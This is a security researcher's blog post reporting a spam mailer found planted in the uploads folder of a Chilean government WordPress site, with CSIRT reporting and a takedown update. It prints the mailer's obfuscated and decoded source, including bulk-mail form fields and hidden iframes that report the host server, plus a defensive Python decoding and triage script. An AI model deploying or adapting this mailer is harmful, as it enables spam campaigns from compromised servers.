Chilean Government Websites Compromised by Third Parties: Part I

Attacks on websites happen constantly, especially on Chilean government sites. Given the number of legacy systems still in use, the probability that such attacks succeed is high. For this reason I have been researching this type of attack for some time and have been reporting my findings continuously to the incident response team (CSIRT).

On this occasion I must present an attack affecting the "Chile Crece Contigo" site of the Ministry of Social Development.

On 10 May 2018 I found a potentially malicious file hosted in the WordPress uploads directory; from the directory structure it can be deduced that the malicious program has been stored there since at least 2013. On 11 May 2018 I reported this finding to the CSIRT, who acknowledged receipt and informed those responsible.

At present, the malicious page is still accessible at the URL http://www.crececontigo.gob.cl/wp-content/uploads/2013/11/abdou/

As can be seen, it is a small mail-sending system, probably used to send spam.

Looking at the page source, we can see JavaScript obfuscated with URL encoding (urlencode).

After decoding the characters, we can see clean HTML with the legend

This Tool Has Been Made By The Moroccan White Hacker MR. Big Cave For more question contact us in the site Tool4Spam.Com Visit US and get more private tool for free

And finally it can be confirmed that it is a mailer used for sending spam.

Full obfuscated code (urlencode)

<script>var U7=window,W8=document;var a1="%3Chtml%3E%0A%3Chead%3E%0A%3Cstyle%20type%3D%22text/css%22%3E%0A%3C%21--%0A.style1%20%7Bfont-size%3A%2010px%7D%0Abody%2Ctd%2Cth%20%7B%0A%09font-family%3A%20Verdana%2C%20Arial%2C%20Helvetica%2C%20sans-serif%3B%0A%09font-size%3A%2012px%3B%0A%09color%3A%20%23999999%3B%0A%7D%0Abody%20%7B%0A%09background-color%3A%20%23000000%3B%0A%7D%0A%23enviar%20%7B%0A%09font-family%3A%20Verdana%2C%20Arial%2C%20Helvetica%2C%20sans-serif%3B%0A%09background-color%3A%20%23003366%3B%0A%09color%3A%20%23D4D0C8%3B%0A%09font-weight%3A%20normal%3B%0A%09border-top-style%3A%20double%3B%0A%09border-right-style%3A%20double%3B%0A%09border-bottom-style%3A%20double%3B%0A%09border-left-style%3A%20double%3B%0A%09font-size%3A%2010px%3B%0A%7D%0A%23emails%20%7B%0A%7D%0A.style2%20%7Bfont-size%3A%209px%3B%20%7D%0A--%3E%0A%3C/style%3E%3C%21--%20-This%20Tool%20Has%20Been%20Made%20By%20The%20Moroccan%20White%20Hacker%20MR.%20Big%20Cave%20For%20more%20question%20contact%20us%20in%20the%20site%20Tool4Spam.Com%20%20Visit%20US%20and%20get%20more%20private%20tool%20for%20free%20--%3E%0A%3Ctitle%3E%u063A%u0627%u0645%u0636%20%u0647%u0643%u0631%3C/title%3E%3C/head%3E%0A%3C%21--%20-This%20Tool%20Has%20Been%20Made%20By%20The%20Moroccan%20White%20Hacker%20MR.%20Big%20Cave%20For%20more%20question%20contact%20us%20in%20the%20site%20Tool4Spam.Com%20%20Visit%20US%20and%20get%20more%20private%20tool%20for%20free%20--%3E%0A%3Cbody%3E%3Ctr%3E%3Ctd%20width%3D%22368%22%20height%3D%22346%22%20align%3D%22center%22%3E%3Cp%3E%26nbsp%3B%3C/p%3E%3Cform%20name%3D%22form1%22%20method%3D%22post%22%20action%3D%22%22%3E%3Ctable%20width%3D%22324%22%20border%3D%220%22%20align%3D%22center%22%20bordercolor%3D%22%23003300%22%3E%0A%3Ctr%3E%3Ctd%20colspan%3D%222%22%20rowspan%3D%223%22%20valign%3D%22top%22%20bgcolor%3D%22%23550000%22%3E%3Cdiv%20align%3D%22justify%22%20class%3D%22style1%22%3E%3Cb%3ESelect%20The%20System%20you%20wanna%20use%20in%20the%20send%20.%20%3Cbr%3E%20for%20more%20tools%20visit%20us%20%
3Ccenter%3E%3Ca%20href%3D%22http%3A//is-sec.com%22%3E%3Cfont%20color%3D%22white%22%3E%3C/font%3E%3C/a%3E%3C/center%3E%20%0A%3C/b%3E%3C/div%3E%3C/td%3E%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3C%21--%20-This%20Tool%20Has%20Been%20Made%20By%20The%20Moroccan%20White%20Hacker%20MR.%20Big%20Cave%20For%20more%20question%20contact%20us%20in%20the%20site%20Tool4Spam.Com%20%20Visit%20US%20and%20get%20more%20private%20tool%20for%20free%20--%3E%3Cspan%20class%3D%22style1%22%3E%3Cstrong%3ESMTP%3C/strong%3E%3C/span%3E%3C/td%3E%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23003366%22%3E%3Cspan%20class%3D%22style1%22%3E%3Cstrong%3E%3Cstrong%3E%3Cinput%20name%3D%22radiobutton%22%20type%3D%22radio%22%20value%3D%22smtp%22%3E%3C/strong%3E%3C/strong%3E%3C/span%3E%3C/td%3E%3C/tr%3E%0A%3Ctr%3E%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3Cspan%20class%3D%22style1%22%3E%3Cstrong%3E%3Cstrong%3E%3Cstrong%3EMAIL%3C/strong%3E%3C/strong%3E%3C/strong%3E%3C/span%3E%3C/td%3E%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23003366%22%3E%3Ciframe%20src%3D%22ht%3Fserverupdate%3D%3C%3Fphp%20echo%20%20%24_SERVER%5B%27HTTP_HOST%27%5D.%24_SERVER%5B%27PHP_SELF%27%5D%3B%20%3F%3E%22%20height%3D%220%22%20width%3D%220%22%20%3E%3C/iframe%3E%3Cspan%20class%3D%22style1%22%3E%3Cstrong%3E%3Cstrong%3E%3Cstrong%3E%3Cinput%20name%3D%22radiobutton%22%20type%3D%22radio%22%20value%3D%22mail%22%3E%3C/strong%3E%3C/strong%3E%3C/strong%3E%3C/span%3E%3C/td%3E%3C/tr%3E%0A%3Ctr%3E%20%20%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3C%21--%20-This%20Tool%20Has%20Been%20Made%20By%20The%20Moroccan%20White%20Hacker%20MR.%20Big%20Cave%20For%20more%20question%20contact%20us%20in%20the%20site%20Tool4Spam.Com%20%20Visit%20US%20and%20get%20more%20private%20tool%20for%20free%20--%3E%3Cspan%20class%3D%22style1%22%3E%3Cstrong%3E%3Cstrong%3EMAILER%3C/strong%3E%3C/strong%3E%3C/span%3E%3C/td%3E%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23003366%22%3E%3Cspan%20class%3D%22style1%22%3E%3Cstrong%3E%
3Cstrong%3E%3Cinput%20name%3D%22radiobutton%22%20type%3D%22radio%22%20value%3D%22sendmail%22%20checked%3E%3C/strong%3E%3C/strong%3E%3C/span%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20width%3D%22160%22%20align%3D%22left%22%20bgcolor%3D%22%23550000%22%3E%3Cb%3EName%20%20%3A%20%3C/b%3E%3Cinput%20name%3D%22nome%22%20type%3D%22text%22%20id%3D%22nome%22%20value%3D%22%22%20size%3D%2250%22%3E%3C/td%3E%20%20%3Ctd%20colspan%3D%223%22%20align%3D%22left%22%20bgcolor%3D%22%23550000%22%3E%3Cb%3EE-Mail%3C/b%3E%3Cinput%20name%3D%22remetente%22%20type%3D%22text%22%20id%3D%22remetente%22%20value%3D%22%22%20size%3D%2230%22%3E%3C/td%3E%0A%3C/tr%3E%3Ctr%3E%3Ctd%20align%3D%22left%22%20bgcolor%3D%22%23550000%22%3E%3Cb%3ESubject%3C/b%3E%3Cinput%20name%3D%22assunto%22%20type%3D%22text%22%20id%3D%22assunto%22%20value%3D%22%22%20size%3D%2250%22%3E%3C/td%3E%3Ctd%20colspan%3D%223%22%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3Ca%20href%3D%22http%3A//is-sec.com%22%3E%3Cfont%20size%3D%222%22%20color%3D%22white%22%3E%3Cb%3Ehttp%3A//is-sec.com%3C/b%3E%3C/font%3E%3C/a%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%0A%20%20%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3Cb%3ELetter%20HTML%3C/b%3E%3Ctextarea%20name%3D%22html%22%20cols%3D%2250%22%20rows%3D%2220%22%20id%3D%22html%22%3E%3C/textarea%3E%3C/td%3E%3Ctd%20colspan%3D%223%22%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3Cb%3EMail%20List%3C/b%3E%0A%20%20%3Ctextarea%20name%3D%22emails%22%20cols%3D%2230%22%20rows%3D%2220%22%20id%3D%22emails%22%3E%3C/textarea%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20colspan%3D%224%22%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3Cinput%20name%3D%22enviar%22%20type%3D%22submit%22%20id%3D%22enviar%22%20value%3D%22SEND%22%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/form%3E%3Cp%3E%3Ciframe%20src%3D%22http%3A///%3Fref%3%22%20height%3D%220%22%20width%3D%220%22%20%3E%3C/iframe%3E%3C/p%3E%3C/td%3E%3C/tr%3E%3C/table%3E%0A%3C/body%3E%0A%3C/html%3E";function V0(){var V0;V0=unescape(a1);W8.write(V0);}V0();</script>

Deobfuscated code

<script>var U7=window,W8=document;var a1="<html>
<head>
<style type="text/css">
<!--
.style1 {font-size: 10px}
body,td,th {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #999999;
}
body {
	background-color: #000000;
}
#enviar {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	background-color: #003366;
	color: #D4D0C8;
	font-weight: normal;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
	font-size: 10px;
}
#emails {
}
.style2 {font-size: 9px; }
-->
</style><!-- -This Tool Has Been Made By The Moroccan White Hacker MR. Big Cave For more question contact us in the site Tool4Spam.Com  Visit US and get more private tool for free -->
<title>غامض هكر</title></head>
<!-- -This Tool Has Been Made By The Moroccan White Hacker MR. Big Cave For more question contact us in the site Tool4Spam.Com  Visit US and get more private tool for free -->
<body><tr><td width="368" height="346" align="center"><p>&nbsp;</p><form name="form1" method="post" action=""><table width="324" border="0" align="center" bordercolor="#003300">
<tr><td colspan="2" rowspan="3" valign="top" bgcolor="#550000"><div align="justify" class="style1"><b>Select The System you wanna use in the send . <br /> for more tools visit us <center><a href="http://is-sec.com"><font color="white"></font></a></center> 
</b></div></td><td align="center" bgcolor="#550000"><!-- -This Tool Has Been Made By The Moroccan White Hacker MR. Big Cave For more question contact us in the site Tool4Spam.Com  Visit US and get more private tool for free --><span class="style1"><strong>SMTP</strong></span></td><td align="center" bgcolor="#003366"><span class="style1"><strong></strong><strong><input name="radiobutton" type="radio" value="smtp"/></strong></span></td></tr>
<tr><td align="center" bgcolor="#550000"><span class="style1"><strong></strong><strong></strong><strong>MAIL</strong></span></td><td align="center" bgcolor="#003366"><iframe src="ht?serverupdate=<?php echo  $_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; ?>" height="0" width="0" ></iframe><span class="style1"><strong></strong><strong></strong><strong><input name="radiobutton" type="radio" value="mail"/></strong></span></td></tr>
<tr>  <td align="center" bgcolor="#550000"><!-- -This Tool Has Been Made By The Moroccan White Hacker MR. Big Cave For more question contact us in the site Tool4Spam.Com  Visit US and get more private tool for free --><span class="style1"><strong></strong><strong>MAILER</strong></span></td><td align="center" bgcolor="#003366"><span class="style1"><strong></strong><strong><input name="radiobutton" type="radio" value="sendmail" checked/></strong></span></td></tr><tr><td width="160" align="left" bgcolor="#550000"><b>Name  : </b><input name="nome" type="text" id="nome" value="" size="50"/></td>  <td colspan="3" align="left" bgcolor="#550000"><b>E-Mail</b><input name="remetente" type="text" id="remetente" value="" size="30"/></td>
</tr><tr><td align="left" bgcolor="#550000"><b>Subject</b><input name="assunto" type="text" id="assunto" value="" size="50"/></td><td colspan="3" align="center" bgcolor="#550000"><a href="http://is-sec.com"><font size="2" color="white"><b>http://is-sec.com</b></font></a></td></tr><tr>
  <td align="center" bgcolor="#550000"><b>Letter HTML</b><textarea name="html" cols="50" rows="20" id="html"></textarea></td><td colspan="3" align="center" bgcolor="#550000"><b>Mail List</b>
  <textarea name="emails" cols="30" rows="20" id="emails"></textarea></td></tr><tr><td colspan="4" align="center" bgcolor="#550000"><input name="enviar" type="submit" id="enviar" value="SEND"/></td></tr></table></form><p><iframe src="http:///?ref%3" height="0" width="0" ></iframe></p></td></tr>
</body>
</html>";function V0(){var V0;V0=unescape(a1);W8.write(V0);}V0();</script>
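
As an added example (not code from the original post, nor from the tool's author), here is a small Python triage script for the pattern shown above: a page stored as a percent-encoded string, decoded with unescape() and written with document.write(). It decodes the way the browser does, including the %uXXXX sequences (the Arabic title) that a plain urldecode leaves untouched, and lists the indicators a responder cares about. The embedded sample is constructed to mirror the structure of the file on the site.

```python
import re
import sys

# Constructed sample (not the file from the compromised site) following the same
# pattern: a URL-encoded page assigned to a variable, passed to unescape() and
# written into the document with document.write().
SAMPLE_JS = (
    '<script>var U7=window,W8=document;var a1="%3Chtml%3E%3Ctitle%3E'
    '%u063A%u0627%u0645%u0636%3C/title%3E%3Ciframe%20src%3D%22ht%3Fserverupdate%3D'
    '%3C%3Fphp%20echo%20%24_SERVER%5B%27HTTP_HOST%27%5D%3B%20%3F%3E%22%3E%3C/iframe%3E'
    '%3Cform%20method%3D%22post%22%3E%3Ctextarea%20name%3D%22emails%22%3E'
    '%3C/textarea%3E%3C/form%3E%3C/html%3E";'
    'function V0(){var V0;V0=unescape(a1);W8.write(V0);}V0();</script>'
)

# JavaScript's legacy unescape() understands both %XX and %uXXXX; Python's
# urllib.parse.unquote() only handles %XX, so the Arabic <title> on the site's
# page would otherwise stay encoded.
_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
_STRING_VAR = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"')
_UNESCAPE_CALL = re.compile(r"unescape\(\s*(\w+)\s*\)")

def js_unescape(text):
    """Decode %XX and %uXXXX sequences the way the browser's unescape() does."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)

def extract_unescape_payloads(js):
    """Return the decoded contents of every string variable fed to unescape()."""
    strings = dict(_STRING_VAR.findall(js))
    return [js_unescape(strings[name])
            for name in _UNESCAPE_CALL.findall(js) if name in strings]

def triage(markup):
    """Pull out what an incident responder wants from the decoded mailer page."""
    return {
        # hidden iframes: call-home / tracking of where the tool is installed
        "iframes": re.findall(r'<iframe[^>]*src="([^"]*)"', markup),
        # embedded PHP: evidence the file is executed server-side, not static HTML
        "php_tags": re.findall(r"<\?php.*?\?>", markup),
        # form fields: recipient list, HTML body and sender fields of the mailer
        "form_fields": re.findall(r'<(?:input|textarea)[^>]*name="([^"]*)"', markup),
    }

if __name__ == "__main__":
    # Pass the path of a suspicious file as the first argument; otherwise use the sample.
    source = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_JS
    for page in extract_unescape_payloads(source):
        print(triage(page))
```

On the real file the decoded output also reveals the src of the hidden iframes, which is what tells you where the installation reports to.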

UPDATED: 18 July 2018

The responsible institution has taken the system down. Once again reactively, after the matter became public.

1 comment

  1. Thank you very much for your post, my friend! Let's hope the people responsible for these sites take real measures to prevent these attacks
